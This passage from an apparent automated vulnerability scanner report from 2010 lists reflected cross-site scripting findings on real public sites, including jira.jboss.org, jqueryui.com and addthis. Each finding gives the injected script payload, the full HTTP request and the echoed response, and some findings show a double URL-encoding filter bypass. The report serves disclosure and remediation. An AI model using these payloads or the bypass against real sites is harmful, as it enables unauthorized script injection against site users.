Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Connection: close
Content-Length: 46183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<input type="text" name="emailAddress" id="emailAddress" value="rtfm@fastdial.net52342"><script>alert(1)</script>817de34b9e88d53ed" class="jive-validate-email"/>
...[SNIP]...

4.108. http://devoxx.com/display/Devoxx2K10/Home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Home

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a8f51--><script>alert(1)</script>db69e0aef33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Home?a8f51--><script>alert(1)</script>db69e0aef33=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:25:26 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289841926516
Set-Cookie: JSESSIONID=20A4F26984442A3D698F78937A8D5972; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 38262

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Home?a8f51--><script>alert(1)</script>db69e0aef33=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@3ab9ffe0
adaptavist.builder.helper: com.atlass
...[SNIP]...

4.109. http://ds.addthis.com/red/psi/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7b95d<script>alert(1)</script>6a1369cd27b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/p.json?callback=_ate.ad.hpr7b95d<script>alert(1)</script>6a1369cd27b HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; Domain=.addthis.com; Expires=Sun, 13 Feb 2011 06:29:43 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 15 Nov 2010 06:29:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Nov 2010 06:29:43 GMT
Connection: close

_ate.ad.hpr7b95d<script>alert(1)</script>6a1369cd27b({"urls":[],"segments" : [],"loc": "NzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg=="})

4.110. http://fisheye.jboss.org/browse [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fisheye.jboss.org
Path:   /browse

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5bf3"><script>alert(1)</script>2948a8d6823 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browse?e5bf3"><script>alert(1)</script>2948a8d6823=1 HTTP/1.1
Host: fisheye.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://fisheye.jboss.org/browse/
Cookie: FESESSIONID=8s2yaeqmbqpv16w8nsad69bey; crucibleprefs1="D%3D1289838739500%3Bslp%3Dt";

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 18:39:41 GMT
Server: Jetty(6.1.24)
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 33437


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>Repositories</title>


<link rel="SH
...[SNIP]...
<a href="
/browse/?e5bf3"><script>alert(1)</script>2948a8d6823=1&amp;d=desc&amp;sort=display_name">
...[SNIP]...

4.111. http://fisheye.jboss.org/browse/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fisheye.jboss.org
Path:   /browse/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e81b"><script>alert(1)</script>239ec7c39ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browse/?6e81b"><script>alert(1)</script>239ec7c39ac=1 HTTP/1.1
Host: fisheye.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 18:39:35 GMT
Server: Jetty(6.1.24)
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 33439


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>Repositories</title>


<link rel="SH
...[SNIP]...
<a href="
/browse/?d=desc&amp;sort=display_name&amp;6e81b"><script>alert(1)</script>239ec7c39ac=1">
...[SNIP]...

4.112. http://fisheye.jboss.org/changelog/~feedspan=1mo,feedmax=50/Seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fisheye.jboss.org
Path:   /changelog/~feedspan=1mo,feedmax=50/Seam

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b441%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06c6c8f234b was submitted in the REST URL parameter 2. This input was echoed as 1b441"><script>alert(1)</script>06c6c8f234b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /changelog/~feedspan1b441%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06c6c8f234b=1mo,feedmax=50/Seam HTTP/1.1
Host: fisheye.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:35:14 GMT
Server: Jetty(6.1.24)
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 324712


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>Activity Seam/</title>


<link rel="SHORT
...[SNIP]...
<form action="/changelog/~feedspan1b441"><script>alert(1)</script>06c6c8f234b=1mo,feedmax=50/Seam/" class="changelog-form">
...[SNIP]...

4.113. http://fisheye.jboss.org/changelog/~feedspan=1mo,feedmax=50/weld [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fisheye.jboss.org
Path:   /changelog/~feedspan=1mo,feedmax=50/weld

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6f00%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee171f9e0308 was submitted in the REST URL parameter 2. This input was echoed as a6f00"><script>alert(1)</script>e171f9e0308 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /changelog/~feedspana6f00%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee171f9e0308=1mo,feedmax=50/weld HTTP/1.1
Host: fisheye.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:35:17 GMT
Server: Jetty(6.1.24)
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 305553


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>Activity weld/</title>


<link rel="SHORT
...[SNIP]...
<form action="/changelog/~feedspana6f00"><script>alert(1)</script>e171f9e0308=1mo,feedmax=50/weld/" class="changelog-form">
...[SNIP]...

4.114. http://flowplayer.org/tools/scrollable.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://flowplayer.org
Path:   /tools/scrollable.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0544"><img%20src%3da%20onerror%3dalert(1)>be18d6c294f was submitted in the REST URL parameter 1. This input was echoed as e0544"><img src=a onerror=alert(1)>be18d6c294f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /toolse0544"><img%20src%3da%20onerror%3dalert(1)>be18d6c294f/scrollable.html HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Mon, 15 Nov 2010 17:33:55 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Vary: Accept-Encoding
Cache-control: private
Content-Length: 5899


   <!DOCTYPE html>
   

<!--
   Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen
   
   Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<body id="toolse0544"><img src=a onerror=alert(1)>be18d6c294f_scrollable" class="msie tools">
...[SNIP]...

4.115. https://home.vembu.com/account.php [error parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://home.vembu.com
Path:   /account.php

Issue detail

The value of the error request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84984</script><script>alert(1)</script>cd92040e158 was submitted in the error parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account.php?page=login&error=84984</script><script>alert(1)</script>cd92040e158 HTTP/1.1
Host: home.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vhbsc=bvvf4kfqpt8c7u7r1prvh56in2;

Response

HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 06:57:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="google-site-ve
...[SNIP]...
display","none");
//$("#message").css("display","block");
// $("#message_container").css("position","static");
//$("#message").css("width","979px");

showMessage(0,true,"84984</script><script>alert(1)</script>cd92040e158","","");
});

$(document).ready(function() {
showLogin();
var ua=navigator.userAgent.toLowerCase();
if(!((ua.indexOf('konqueror')!=-1) && /khtml\/3\.[0-4]/.test(u
...[SNIP]...

4.116. http://img.mediaplex.com/content/0/11921/102238/circa_300x250Revised.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/11921/102238/circa_300x250Revised.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f1ba"%3balert(1)//575707e5323 was submitted in the mpck parameter. This input was echoed as 9f1ba";alert(1)//575707e5323 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/11921/102238/circa_300x250Revised.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F11921-102238-1358-0%3Fmpt%3D2010.11.15.07.15.419f1ba"%3balert(1)//575707e5323&mpt=2010.11.15.07.15.41&mpvc= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Cookie: svid=804356890302; mojo3=11921:1358/11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:20:29 GMT
Server: Apache
Last-Modified: Thu, 24 Jun 2010 14:58:41 GMT
ETag: "428a17-b94-489c7e3d92a40"
Accept-Ranges: bytes
Content-Length: 4201
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<a href=\"http://altfarm.mediaplex.com/ad/ck/11921-102238-1358-0?mpt=2010.11.15.07.15.419f1ba";alert(1)//575707e5323\" target=\"_blank\">
...[SNIP]...

4.117. http://img.mediaplex.com/content/0/11921/102238/circa_300x250Revised.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/11921/102238/circa_300x250Revised.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e733"%3balert(1)//2ab4c249393 was submitted in the mpvc parameter. This input was echoed as 5e733";alert(1)//2ab4c249393 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/11921/102238/circa_300x250Revised.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F11921-102238-1358-0%3Fmpt%3D2010.11.15.07.15.41&mpt=2010.11.15.07.15.41&mpvc=5e733"%3balert(1)//2ab4c249393 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Cookie: svid=804356890302; mojo3=11921:1358/11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:20:31 GMT
Server: Apache
Last-Modified: Thu, 24 Jun 2010 14:58:41 GMT
ETag: "428a17-b94-489c7e3d92a40"
Accept-Ranges: bytes
Content-Length: 4177
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=5e733";alert(1)//2ab4c249393http://altfarm.mediaplex.com%2Fad%2Fck%2F11921-102238-1358-0%3Fmpt%3D2010.11.15.07.15.41&clickTag=5e733";alert(1)//2ab4c249393http://altfarm.mediaplex.com%2Fad%2Fck%2F11921-102238-1358-0%3Fmpt%3D2010.1
...[SNIP]...

4.118. https://jira.jboss.org/rest/activity-stream/1.0/url [keys parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://jira.jboss.org
Path:   /rest/activity-stream/1.0/url

Issue detail

The value of the keys request parameter is copied into the HTML document as plain text between tags. The payload 1f82f<script>alert(1)</script>d55a495333 was submitted in the keys parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rest/activity-stream/1.0/url?keys=SEAMJMS1f82f<script>alert(1)</script>d55a495333&numofentries=10&username= HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: https://jira.jboss.org/plugins/servlet/gadgets/ifr?container=atlassian&mid=stream&country=US&lang=en&view=default&view-params=%7B%22writable%22%3A%22false%22%7D&st=atlassian%3A%2F1aWbDB6TX%2BAyrGE%2B%2BhAaq4GCFKtIbqfC9Lbx8jnWsqDclsCv3HpHfC8%2BOvPR6Wb2fOB30d3qlAV0iECalh0Hne1yg3Yln%2BdK0M6ZFuzhISnCoL4zkLEg7T1Y%2B5QM%2FOAAIPLRSCWMk0EmhIKm6w2BEONzbVtWK81waFH0PlAKo6ZgzkM5KvX9SVZerROYub%2BNgPfYikgbV1hErZhfNOEpVI3dkqZpkkGd%2FbvjZZISS3R%2BshTgtFbc9O5kn7YhHTr5YDQTg%3D%3D&up_isConfigured=true&up_isConfigurable=false&up_refresh=false&up_title=&up_titleRequired=false&up_keys=SEAMJMS&up_itemKeys=&up_username=&up_numofentries=10&url=https%3A%2F%2Fjira.jboss.org%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.streams.streams-jira-plugin%2Fgadgets%2Factivitystream-gadget.xml&libs=auth-refresh
Accept: application/json, text/javascript, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jira.jboss.org
Connection: Keep-Alive
Cookie: JSESSIONID=054235C303669934768F68853A63ADCC

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:00:53 GMT
Server: Apache-Coyote/1.1
X-AREQUESTID: 540x976473x15
X-ASESSIONID: 3jsbox
X-AUSERNAME: anonymous
Cache-Control: no-cache, no-store, no-transform
Content-Type: application/json;charset=UTF-8
Content-Length: 86
Connection: close

{"url":"/plugins/servlet/streams?key=SEAMJMS1f82f<script>alert(1)</script>d55a495333"}

4.119. https://jira.jboss.org/rest/activity-stream/1.0/url [username parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://jira.jboss.org
Path:   /rest/activity-stream/1.0/url

Issue detail

The value of the username request parameter is copied into the HTML document as plain text between tags. The payload 1bcd4<script>alert(1)</script>d253e6aeae3 was submitted in the username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rest/activity-stream/1.0/url?keys=SEAMJMS&numofentries=10&username=1bcd4<script>alert(1)</script>d253e6aeae3 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: https://jira.jboss.org/plugins/servlet/gadgets/ifr?container=atlassian&mid=stream&country=US&lang=en&view=default&view-params=%7B%22writable%22%3A%22false%22%7D&st=atlassian%3A%2F1aWbDB6TX%2BAyrGE%2B%2BhAaq4GCFKtIbqfC9Lbx8jnWsqDclsCv3HpHfC8%2BOvPR6Wb2fOB30d3qlAV0iECalh0Hne1yg3Yln%2BdK0M6ZFuzhISnCoL4zkLEg7T1Y%2B5QM%2FOAAIPLRSCWMk0EmhIKm6w2BEONzbVtWK81waFH0PlAKo6ZgzkM5KvX9SVZerROYub%2BNgPfYikgbV1hErZhfNOEpVI3dkqZpkkGd%2FbvjZZISS3R%2BshTgtFbc9O5kn7YhHTr5YDQTg%3D%3D&up_isConfigured=true&up_isConfigurable=false&up_refresh=false&up_title=&up_titleRequired=false&up_keys=SEAMJMS&up_itemKeys=&up_username=&up_numofentries=10&url=https%3A%2F%2Fjira.jboss.org%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.streams.streams-jira-plugin%2Fgadgets%2Factivitystream-gadget.xml&libs=auth-refresh
Accept: application/json, text/javascript, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jira.jboss.org
Connection: Keep-Alive
Cookie: JSESSIONID=054235C303669934768F68853A63ADCC

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:00:54 GMT
Server: Apache-Coyote/1.1
X-AREQUESTID: 540x976506x27
X-ASESSIONID: 3jsbox
X-AUSERNAME: anonymous
Cache-Control: no-cache, no-store, no-transform
Content-Type: application/json;charset=UTF-8
Content-Length: 99
Connection: close

{"url":"/plugins/servlet/streams?filterUser=1bcd4<script>alert(1)</script>d253e6aeae3&key=SEAMJMS"}

4.120. https://jira.jboss.org/secure/QuickSearch.jspa [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://jira.jboss.org
Path:   /secure/QuickSearch.jspa

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaffd"><script>alert(1)</script>539f0945265 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /secureaaffd"><script>alert(1)</script>539f0945265/QuickSearch.jspa HTTP/1.1
Host: jira.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=054235C303669934768F68853A63ADCC;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:30:44 GMT
Server: Apache-Coyote/1.1
X-AREQUESTID: 570x995774x1
X-ASESSIONID: 3jsbox
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-AUSERNAME: anonymous
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 124457


<html>
<head>
<content tag="section">find_link</content>
   <title>Issue Navigator</title>

<link rel="alternate" title="" href="/secure/IssueNavigator.jspa?view=rss&&amp;jqlQuery=p
...[SNIP]...
<th class="colHeaderLink sortable headerrow-issuetype" rel="issuetype:DESC" onClick="window.document.location='/secureaaffd"><script>alert(1)</script>539f0945265/IssueNavigator.jspa?sorter/field=issuetype&sorter/order=DESC'"


>
...[SNIP]...

4.121. http://jqueryui.com/themeroller/ [bgColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63c21"><script>alert(1)</script>e0a91ab37f6 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff63c21"><script>alert(1)</script>e0a91ab37f6&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff63c21"><script>alert(1)</script>e0a91ab37f6&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighligh
...[SNIP]...

4.122. http://jqueryui.com/themeroller/ [bgColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1123d"><script>alert(1)</script>9442397b621 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee1123d"><script>alert(1)</script>9442397b621&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=